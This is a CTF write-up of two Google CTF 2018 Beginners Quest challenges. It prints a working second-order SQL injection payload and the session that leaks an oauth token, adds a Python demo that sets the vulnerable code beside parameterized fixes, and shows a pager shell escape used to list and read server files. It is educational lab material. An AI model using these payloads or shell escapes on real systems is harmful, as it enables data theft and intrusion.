2018/11/12

Google CTF Beginners Quest MEDIA-DB

We are given a Python script that drives an sqlite3 database.

When the script starts, the flag is inserted into the oauth_token column of the oauth_tokens table.

import sqlite3

with open('oauth_token') as fd:
  flag = fd.read()

conn = sqlite3.connect(':memory:')
c = conn.cursor()

c.execute("CREATE TABLE oauth_tokens (oauth_token text)")
c.execute("CREATE TABLE media (artist text, song text)")
# the flag is spliced into the statement with str.format rather than bound as a parameter
c.execute("INSERT INTO oauth_tokens VALUES ('{}')".format(flag))

Several functions can then be used, but the insert function only strips double quotes and does not escape single quotes.

  if choice == '1':
    my_print("artist name?")
    artist = raw_input().replace('"', "")
    my_print("song name?")
    song = raw_input().replace('"', "")
    c.execute("""INSERT INTO media VALUES ("{}", "{}")""".format(artist, song))

There is also a function that picks a random artist from the media table and uses the result directly in a WHERE clause.

  elif choice == '4':
    artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
    my_print("choosing songs from random artist: {}".format(artist))
    print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))

So, after inserting as the artist name a string that retrieves the oauth_token value, the shuffle function uses that stored string and returns the flag.
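As an added example that is not part of the challenge script or this write-up, the following reproduces the two tables in memory and places the vulnerable add/shuffle path beside a parameterized version. The artist value is the one used in the write-up; the flag value and the function names (make_db, add_song_vulnerable, shuffle_vulnerable, add_song_safe, shuffle_safe, leaks_token) are constructed here. The vulnerable shuffle executes the stored string as SQL, while the hardened shuffle binds the value read back from the database as a parameter and returns only the literal row.

```python
import random
import sqlite3

# Constructed stand-in for the challenge's secret (replaces the file read).
FLAG = "CTF{DUMMY_FLAG}"

# The artist name from the write-up. It is stored first and only becomes
# dangerous when a later query interpolates it (second-order injection).
PAYLOAD = "1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; --"


def make_db():
    """Build the same two tables the challenge script creates, in memory."""
    conn = sqlite3.connect(":memory:")
    c = conn.cursor()
    c.execute("CREATE TABLE oauth_tokens (oauth_token text)")
    c.execute("CREATE TABLE media (artist text, song text)")
    c.execute("INSERT INTO oauth_tokens VALUES (?)", (FLAG,))
    return conn


def add_song_vulnerable(c, artist, song):
    """Mirror of choice '1': strips double quotes, then string-formats into SQL.
    Relies on SQLite accepting double-quoted string literals (legacy DQS behaviour)."""
    artist = artist.replace('"', "")
    song = song.replace('"', "")
    c.execute('INSERT INTO media VALUES ("{}", "{}")'.format(artist, song))


def shuffle_vulnerable(c):
    """Mirror of choice '4': the stored artist is formatted into the WHERE clause."""
    artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
    return list(c.execute(
        "SELECT artist, song FROM media WHERE artist = '{}'".format(artist)))


def add_song_safe(c, artist, song):
    """Hardened insert: values are bound as parameters, never spliced into SQL."""
    c.execute("INSERT INTO media VALUES (?, ?)", (artist, song))


def shuffle_safe(c):
    """Hardened shuffle: the value read back from the database is bound too.
    Data that came from the database is still data, not trusted SQL."""
    artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
    return list(c.execute(
        "SELECT artist, song FROM media WHERE artist = ?", (artist,)))


def leaks_token(add_fn, shuffle_fn):
    """Store PAYLOAD with add_fn, read back with shuffle_fn, and report whether
    any returned row contains the token. Returns (leaked, rows)."""
    conn = make_db()
    c = conn.cursor()
    add_fn(c, PAYLOAD, "a")
    rows = shuffle_fn(c)
    leaked = any(FLAG in str(col) for row in rows for col in row)
    return leaked, rows


if __name__ == "__main__":
    for label, add_fn, shuffle_fn in (
        ("vulnerable", add_song_vulnerable, shuffle_vulnerable),
        ("parameterized", add_song_safe, shuffle_safe),
    ):
        leaked, rows = leaks_token(add_fn, shuffle_fn)
        print("{}: leaked={} rows={}".format(label, leaked, rows))
```

Note that the fix is needed in both places: parameterizing only the INSERT still leaves the shuffle query splicing a database value into SQL, and any value that reaches the table by another route would be executed there.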

% nc media-db.ctfcompetition.com 1337
=== Media DB ===
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 1
artist name?
1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; --
song name?
a
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 4
choosing songs from random artist: 1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; --

== new playlist ==
1: "a" by "1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; -- "
2: "CTF{DUMMY_FLAG}
" by "CTF{DUMMY_FLAG}
"

Google CTF Beginners Quest MOAR

Running nc moar.ctfcompetition.com 1337 opens man socat. Since !<command> runs shell commands from the pager, look around for suspicious files to find the flag.

$ nc moar.ctfcompetition.com 1337
socat(1)                                                              socat(1)

NAME socat - Multipurpose relay (SOcket CAT)

SYNOPSIS
       socat [options] <address> <address>
       socat -V
       socat -h[h[h]] | -?[?[?]]
       filan
       procan

DESCRIPTION
       Socat  is  a  command  line based utility that establishes two bidirec-
       tional byte streams  and  transfers  data  between  them.  Because  the
       streams  can be constructed from a large set of different types of data
       sinks and sources (see address types),  and  because  lots  of  address
       options  may be applied to the streams, socat can be used for many dif-
       ferent purposes.

       Filan is a utility  that  prints  information  about  its  active  file
       descriptors  to  stdout.  It  has been written for debugging socat, but
       might be useful for other purposes too. Use the -h option to find  more
 Manual page socat(1) line 1 (press h for help or q to quit)!ls
!ls
bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
boot  etc  lib   media  opt  root  sbin  sys  usr
!done  (press RETURN)!ls /home

!ls /home
moar
!done  (press RETURN)!ls /home/moar

!ls /home/moar
disable_dmz.sh
!done  (press RETURN)!cat /home/moar/disable_dmz.sh

!cat /home/moar/disable_dmz.sh
#!/bin/sh

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

echo 'Disabling DMZ using password CTF{DUMMY_FLAG}'
echo CTF{DUMMY_FLAG} > /dev/dmz
!done  (press RETURN)